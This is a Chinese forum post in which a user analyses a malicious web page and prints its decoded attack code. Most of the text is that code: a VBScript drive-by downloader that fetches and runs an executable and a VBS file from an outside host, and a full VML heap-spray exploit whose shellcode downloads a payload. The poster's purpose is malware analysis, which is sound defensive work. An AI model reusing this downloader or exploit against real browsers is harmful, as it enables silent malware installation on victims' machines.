首先声明,本人用的是 KIS 6.0.2.621,组策略禁止修改系统时间,主动防御只开了行为和注册表两项,用的是昨天中午的病毒库。
结果没有中招:硬盘灯亮了一会儿,没有任何提示(病毒库此时已经能报出该病毒)。
一进入该页面,会看到类似“页面未找到”的提示。
查看源代码,看到最后部分- <script language="javascript" src="js.asp?id=204853053&logo=1"></script>
而 js.asp?id=204853053&logo=1 的内容是一段经过转义的脚本,它会被动态写入页面,还原转义后为:- <script language="VBScript>
- on error resume next
- Set df = document.createElement("object")
- df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
- str="Microsoft.XMLHTTP"
- Set x = df.CreateObject(str,"")
- a1="Ado"
- a2="db."
- a3="Str"
- a4="eam"
- str1=a1&a2&a3&a4
- str5=str1
- set S = df.createobject(str5,"")
- S.type = 1
- str6="GET"
- x.Open str6, "http://www.17173-map.com/yycx/ahd41d.exe", False
- x.Send
- fsssname1="c:\\wing.exe"
- set F = df.createobject("Scripting.FileSystemObject","")
- set tmp = F.GetSpecialFolder(2)
- S.open
- S.write x.responseBody
- S.savetofile fsssname1,2
- S.close
- set Q = df.createobject("Shell.Application","")
- </script>
- <html>
- <script language="VBScript>
- on error resume next
- Set df = document.createElement("object")
- df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
- str="Microsoft.XMLHTTP"
- Set x = df.CreateObject(str,"")
- a1="Ado"
- a2="db."
- a3="Str"
- a4="eam"
- str1=a1&a2&a3&a4
- str5=str1
- set S = df.createobject(str5,"")
- if Not Err.Number = 0 then
- err.clear
- document.write ("<iframe src=704.html width=0 height=0 >")
- else
- S.type = 1
- str6="GET"
- x.Open str6, "http://www.17173-map.com/hh/41/yt.vbs", False
- x.Send
- fsssname1="yt.vbs"
- set F = df.createobject("Scripting.FileSystemObject","")
- set tmp = F.GetSpecialFolder(2)
- fsssname1= F.BuildPath(tmp,fsssname1)
- S.open
- S.write x.responseBody
- S.savetofile fsssname1,2
- S.close
- set Q = df.createobject("Shell.Application","")
- Q.ShellExecute fsssname1,"","","o"&"pen",0
- end if
- </script>
- <head>
- <title></title>
- </head>
- <body>
- <script src='http://s100.cnzz.com/stat.php?id=386636&web_id=386636&show=pic' language='JavaScript' charset='gb2312'></script>
- </body></html>
分析上面的代码可以看到:
脚本先尝试把http://www.17173-map.com/yycx/ahd41d.exe下载到c:\wing.exe并尝试运行
然后第二段脚本会再次尝试创建 ADODB.Stream 对象:如果创建失败(Err.Number 不为 0),就向页面写入一个隐藏 iframe 去调用 704.html;如果创建成功,则直接下载并运行 http://www.17173-map.com/hh/41/yt.vbs
最后,又调用js脚本http://s100.cnzz.com/stat.php?id=386636&web_id=386636&show=pic
第一个 ahd41d.exe,昨天的病毒库扫不出来,今天的病毒库已经报为 Trojan-Downloader.Win32.Delf.bif
第二个 http://www.17173-map.com/hh/41/yt.vbs 脚本的作用就是每 5 秒运行一次第一步生成的文件 c:\wing.exe
第三个是调用中国站长联盟 cnzz.com 的统计脚本,获取你 cookie 中的一些信息以及你机器的一些外部信息,并发送到 http://bsl41.com.cn,这应该是木马主人的空间,这样既能提高自己主页的排名,又能拿到受害者的信息
至于那个 703.htm,又包含转义脚本,晕,转义完后一看,还是转义脚本,晕晕,看了半天看不懂,晕晕晕
贴出来大家一起分析吧,我是无能为力了
注:如果直接贴原文,返回的页面会被卡巴认为是攻击,所以把所有尖括号都替换掉了。
- 〈!-- vml'exploit! --〉
- 〈html xmlns:v="urn:schemas-microsoft-com:vml"〉
- 〈head〉
- 〈object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E"〉
- 〈/object〉
- 〈style〉
- v\:* { behavior: url(#VMLRender); }
- 〈/style〉
- 〈/head〉
- 〈body〉
- 〈script language="javascript"〉
- var shellcode = unescape("%u9090"+"%u9090"+
- "%u6460%u30a1%u0000%u8b00%u0c40%u708b%uad1c%u708b" +
- "%u8108%u00ec%u0004%u8b00%u56ec%u8e68%u0e4e%ue8ec" +
- "%u00ff%u0000%u4589%u5604%u9868%u8afe%ue80e%u00f1" +
- "%u0000%u4589%u5608%u2568%uffb0%ue8c2%u00e3%u0000" +
- "%u4589%u560c%uef68%ue0ce%ue860%u00d5%u0000%u4589" +
- "%u5610%uc168%ue579%ue8b8%u00c7%u0000%u4589%u4014" +
- "%u3880%u75c3%u89fa%u1845%u08e9%u0001%u5e00%u7589" +
- "%u8b24%u0445%u016a%u8b59%u1855%ue856%u008c%u0000" +
- "%u6850%u1a36%u702f%u98e8%u0000%u8900%u1c45%uc58b" +
- "%uc083%u8950%u2045%uff68%u0000%u5000%u458b%u6a14" +
- "%u5902%u558b%ue818%u0062%u0000%u4503%uc720%u5c00" +
- "%u2e7e%uc765%u0440%u6578%u0000%u75ff%u8b20%u0c45" +
- "%u016a%u8b59%u1855%u41e8%u0000%u6a00%u5807%u4503" +
- "%u3324%u53db%uff53%u2075%u5350%u458b%u6a1c%u5905" +
- "%u558b%ue818%u0024%u0000%u006a%u75ff%u8b20%u0845" +
- "%u026a%u8b59%u1855%u11e8%u0000%u8100%u00c4%u0004" +
- "%u6100%uc481%u04dc%u0000%uc25d%u0024%u5b41%u0352" +
- "%u03e1%u03e1%u03e1%u83e1%u04ec%u535a%uda8b%uf7e2" +
- "%uff52%u55e0%uec8b%u7d8b%u8b08%u0c5d%u8b56%u3c73" +
- "%u748b%u781e%uf303%u8b56%u2076%uf303%uc933%u4149" +
- "%u03ad%u56c3%uf633%ube0f%u3a10%u74f2%uc108%u0dce" +
- "%uf203%ueb40%u3bf1%u5efe%ue575%u8b5a%u8beb%u245a" +
- "%udd03%u8b66%u4b0c%u5a8b%u031c%u8bdd%u8b04%uc503" +
- "%u5d5e%u08c2%ue800%ufef3%uffff%u5255%u4d4c%u4e4f" +
- "%u6800%u7474%u3a70%u2f2f%u7777%u2e77%u3731%u3731" +
- "%u2d33%u616d%u2e70%u6f63%u2f6d%u7979%u7863%u612f" +
- "%u6468%u3134%u2e64%u7865%u0065");
- bigblock = unescape("%u0505%u0505");
- headersize = 20;
- slackspace = headersize+shellcode.length;
- while (bigblock.length〈slackspace) bigblock+=bigblock;
- fillblock = bigblock.substring(0, slackspace);
- block = bigblock.substring(0, bigblock.length-slackspace);
- while(block.length+slackspace〈0x40000) block = block+block+fillblock;
- memory = new Array();
- hh = memory;
- for (i=0;i〈350;i++) hh[i] = block + shellcode;
- 〈/script〉
- 〈v:rect style='width:120pt;height:80pt' fillcolor="red" 〉
- 〈v:recolorinfo recolorstate="t" numcolors="97612895"〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v:recolorinfoentry tocolor="rgb(1,1,1)" recolortype="1285"
- lbcolor="rgb(1,1,1)" forecolor="rgb(1,1,1)" backcolor="rgb(1,1,1)"
- fromcolor="rgb(1,1,1)" lbstyle ="32" bitmaptype="3"/〉
- 〈v/recolorinfo〉
- 〈/html〉